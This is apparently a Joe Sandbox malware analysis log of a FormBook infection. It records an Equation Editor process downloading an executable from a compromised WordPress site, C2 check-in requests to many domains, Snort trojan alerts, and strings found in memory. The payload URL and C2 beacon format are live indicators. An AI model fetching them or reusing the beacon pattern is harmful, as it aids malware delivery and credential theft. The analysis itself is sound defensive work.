          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global traffic | DNS query: name: mail.treeoflifeadventures.com
          Source: global traffic | DNS query: name: www.narrativepages.com
          Source: global traffic | DNS query: name: www.credit-cards-16215.bond
          Source: global traffic | DNS query: name: www.luxpsy.com
          Source: global traffic | DNS query: name: www.sxchenggu.com
          Source: global traffic | DNS query: name: www.centralngs.com
          Source: global traffic | DNS query: name: www.west-paws.com
          Source: global traffic | DNS query: name: www.pj69vip12.cyou
          Source: global traffic | DNS query: name: www.miamirealestatecommercial.com
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 4x nop then pop edi | 7_2_00417D74
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi | 10_2_000D7D74
          Source: global traffic | TCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 103.224.212.212:80
          Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 91.195.240.19:80
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 38.11.36.68:80
          Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 3.33.130.190:80
          Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 34.149.87.45:80
          Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 206.188.193.211:80

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.212 80
          Source: C:\Windows\explorer.exe | Network Connect: 206.188.193.211 80
          Source: C:\Windows\explorer.exe | Domain query: www.credit-cards-16215.bond
          Source: C:\Windows\explorer.exe | Domain query: www.luxpsy.com
          Source: C:\Windows\explorer.exe | Domain query: www.centralngs.com
          Source: C:\Windows\explorer.exe | Domain query: www.west-paws.com
          Source: C:\Windows\explorer.exe | Domain query: www.miamirealestatecommercial.com
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.19 80
          Source: C:\Windows\explorer.exe | Domain query: www.sxchenggu.com
          Source: C:\Windows\explorer.exe | Network Connect: 38.11.36.68 80
          Source: C:\Windows\explorer.exe | Domain query: www.narrativepages.com
          Source: C:\Windows\explorer.exe | Domain query: www.pj69vip12.cyou
          Source: C:\Windows\explorer.exe | Network Connect: 34.149.87.45 80
          Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
          Source: Traffic | Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49162 -> 41.185.64.155:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49164 -> 103.224.212.212:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 91.195.240.19:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 38.11.36.68:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 3.33.130.190:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.149.87.45:80
          Source: Malware configuration extractor | URLs: www.fakeittilyoumakeitfinance.com/ge06/
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1 | Host: www.narrativepages.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=rR7wD3U/ZV6dBjvSlK9KatPYfQs2u0cQXMzY4PO5wsCIJRW7frAjgDUNgmxBJMGJ1YneTQ==&BL3=KP-PB41 HTTP/1.1 | Host: www.luxpsy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=0+Pk4QqMeOZthSuOlE3hLercqAjKj7AZkI6NQZ8fzlVSI648NH9aZsaxoIAU5h7921vkYw==&BL3=KP-PB41 HTTP/1.1 | Host: www.sxchenggu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=STnFDs3dPiWe372IPmsYuoiBxbI3LvhJSNAXi8QejK8uEGpyoTWx2uWpsN+kECUfI/d5Qw==&BL3=KP-PB41 HTTP/1.1 | Host: www.centralngs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=0AfOVuqZSJfRN5GiS/+VmpnTwyRml/2OLwKSVYenXKtwNMi61Jg0OdgGHf2AFfl8gIxxQw==&BL3=KP-PB41 HTTP/1.1 | Host: www.west-paws.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /ge06/?6l58L2=gDpd64bE+Gog2Ub9xNP+FcNZgu7s+BOO8oofSDr/EnD0mt4NGRW6zjQQOpU+sZp484vtJQ==&BL3=KP-PB41 HTTP/1.1 | Host: www.miamirealestatecommercial.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: mail.treeoflifeadventures.com | Connection: Keep-Alive
          Source: Joe Sandbox View | ASN Name: GridhostZA GridhostZA
          Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox View | IP Address: 41.185.64.155 41.185.64.155
          Source: explorer.exe, 00000008.00000002.851097210.0000000008BFF000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000029EF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
          Source: EQNEDT32.EXE, 00000002.00000002.412473279.00000000005DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mail.treeoflifeadventures.com/wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shel
          Source: word.exe, word.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: word.exe, 00000005.00000000.409599934.0000000000409000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp, word.exe.2.dr, jakatrol2.1[1].exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000008.00000000.412690106.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849552627.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bowllywood.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bowllywood.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bowllywood.com/ge06/www.moderco.net
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bowllywood.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bulgarianarchive.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bulgarianarchive.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bulgarianarchive.com/ge06/www.hndswicco.best
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.bulgarianarchive.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.centralngs.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.centralngs.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.centralngs.com/ge06/www.west-paws.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.centralngs.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.credit-cards-16215.bond
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.credit-cards-16215.bond/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.credit-cards-16215.bond/ge06/www.versebuild.xyz
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.credit-cards-16215.bondReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.daqtpt.cfd
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.daqtpt.cfd/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.daqtpt.cfd/ge06/www.ecoboat.world
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.daqtpt.cfdReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecoboat.world
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecoboat.world/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecoboat.world/ge06/www.bulgarianarchive.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ecoboat.worldReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fakeittilyoumakeitfinance.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fakeittilyoumakeitfinance.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.fakeittilyoumakeitfinance.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hndswicco.best
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hndswicco.best/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hndswicco.best/ge06/www.fakeittilyoumakeitfinance.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hndswicco.bestReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.luxpsy.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.luxpsy.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.luxpsy.com/ge06/www.sxchenggu.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.luxpsy.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.miamirealestatecommercial.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.miamirealestatecommercial.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.miamirealestatecommercial.com/ge06/www.bowllywood.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.miamirealestatecommercial.comReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.moderco.net
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.moderco.net/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.moderco.net/ge06/www.daqtpt.cfd
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.moderco.netReferer:
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.narrativepages.com
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.narrativepages.com/ge06/
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.narrativepages.com/ge06/www.credit-cards-16215.bond
          Source: explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.narrativepages.comReferer:
          Source: explorer.exe, 00000008.00000000.413347575.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.849943461.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413067200.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.00000000074B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413347575.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.413884279.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850716518.0000000007517000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.850269711.0000000003E9C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
